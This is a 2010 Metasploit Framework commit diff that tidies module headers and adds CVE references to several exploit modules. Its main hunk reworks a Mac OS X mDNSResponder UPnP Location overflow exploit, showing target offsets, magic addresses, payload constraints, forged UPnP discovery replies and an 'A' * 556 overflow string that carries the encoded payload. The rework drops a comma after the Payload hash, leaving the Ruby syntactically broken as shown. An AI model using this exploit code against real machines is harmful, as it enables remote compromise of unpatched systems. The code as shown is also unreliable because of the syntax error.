some cleanups, added some CVE references

git-svn-id: file:///home/svn/framework3/trunk@8304 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-28 20:15:32 +00:00 · 2010-01-28 20:15:32 +00:00 · 4751d83cb8
parent 7789db860d
commit 4751d83cb8
8 changed files with 262 additions and 231 deletions
--- a/modules/exploits/osx/mdns/upnp_location.rb
+++ b/modules/exploits/osx/mdns/upnp_location.rb
@ -1,28 +1,61 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
+
 	include Exploit::Remote::Udp

 	def initialize(info = {})
 		super(update_info(info,
 			'Name' => 'Mac OS X mDNSResponder UPnP Location Overflow',
-      'Platform' => 'osx',
-      'DefaultOptions' => { 
+			'Description'    => %q{
+				TODO
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'TBD'
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+				],
+			'DefaultOptions' =>
+				{
 					'SRVPORT' => 1900,
 					'RPORT' => 0
 				},
-      'Targets' => [
-        [ '10.4.8 x86', { # mDNSResponder-108.2
+			'Payload' =>
+				{
+					'BadChars' => "\x00\x3a\x2f",
+					'StackAdjustment' => 0,
+					'Space' => 468
+				}
+			'Platform' => 'osx',
+			'Targets' =>
+				[
+					[ '10.4.8 x86',
+						{ # mDNSResponder-108.2
 							'Arch'                   => ARCH_X86,
-
 							# Offset to mDNSStorage structure
 							'Offset'                 => 21000,
 							'Magic'                  => 0x8fe510a0,
 							'g_szRouterHostPortDesc' => 0x53dc0,
 						}
 					],
-        [ '10.4.0 PPC', { # mDNSResponder-107
+					[ '10.4.0 PPC',
+						{ # mDNSResponder-107
 							'Arch'    => ARCH_PPC,
 							'Offset'  => 21000,
 							'Magic'   => 0x8fe51f4c,
@ -30,14 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					],
 				],
-      'DefaultTarget' => 1,
-
-      'Payload' => {
-        'BadChars' => "\x00\x3a\x2f",
-        'StackAdjustment' => 0,
-        'Space' => 468
-      }
-    ))
+			'DefaultTarget' => 1))

 		register_options([
 			Opt::LHOST(),
@ -94,14 +120,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		begin
 			socket = Rex::Socket.create_udp

-      upnp_location = 
-        "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT']
+			upnp_location = "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT']

 			puts "[*] Listening for UPNP requests on: #{upnp_location}"
 			puts "[*] Sending UPNP Discovery replies..."

 			i = 49152;
-      while i < 65536 && @mutex.synchronize { @found_upnp_port == false }
+			while i < 65536 && @mutex.synchronize {
+				@found_upnp_port == false
+			}
 			key = sprintf("%.2x%.2x%.2x%.2x%.2x",
 				rand(255), rand(255), rand(255), rand(255), rand(255))

@ -109,8 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				@key_to_port[key] = i
 			}

-        upnp_reply =
-          "HTTP/1.1 200 Ok\r\n" +
+			upnp_reply = "HTTP/1.1 200 Ok\r\n" +
 				"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
 				"USN: uuid:7076436f-6e65-1063-8074-0017311c11d4\r\n" +
 				"Location: #{upnp_location}/#{key}.xml\r\n\r\n"
@ -183,8 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			usn = "A" * 556 + payload.encoded
 		end

-    upnp_reply =
-      "HTTP/1.1 200 Ok\r\n" +
+		upnp_reply = "HTTP/1.1 200 Ok\r\n" +
      	"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
 			"USN: #{usn}\r\n" +
 			"Location: http://#{boom}\r\n\r\n"
--- a/modules/exploits/unix/misc/zabbix_agent_exec.rb
+++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb
@ -9,10 +9,8 @@
 # http://metasploit.com/framework/
 ##

-
 require 'msf/core'

-
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking

@ -26,13 +24,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
 			can only be exploited if the attacker can hijack the IP address
 			of an authorized server (as defined in the configuration file).
-					
 			},
 			'Author'         => [ 'hdm' ],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
+					[ 'CVE', '2009-4502' ],
 					[ 'OSVDB', '60956' ],
 					[ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
 				],
--- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb
+++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb
@ -1,5 +1,5 @@
 ##
-#
+# $Id$
 ##

 ##
--- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb
+++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb
@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     => 
 				[
-					[ 'URL', 'http://www.metasploit.com' ],
 					[ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
 				],
 			'DefaultOptions' =>
--- a/modules/exploits/windows/fileformat/etrust_pestscan.rb
+++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb
@ -1,9 +1,13 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/projects/Framework/
-###
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##

 require 'msf/core'

@ -25,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
-					[ 'URL', 'http://www.metasploit.com' ],
+					[ 'CVE', '2009-4225' ],
 					[ 'URL', 'http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm' ],
 				],
 			'DefaultOptions' =>
--- a/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb
+++ b/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb
@ -1,9 +1,13 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##

 require 'msf/core'

@ -25,8 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
+					[ 'CVE', '2009-4265' ],
 					[ 'OSVDB', '60681' ],
-					[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/10319' ]
 				],
 			'DefaultOptions' =>
 				{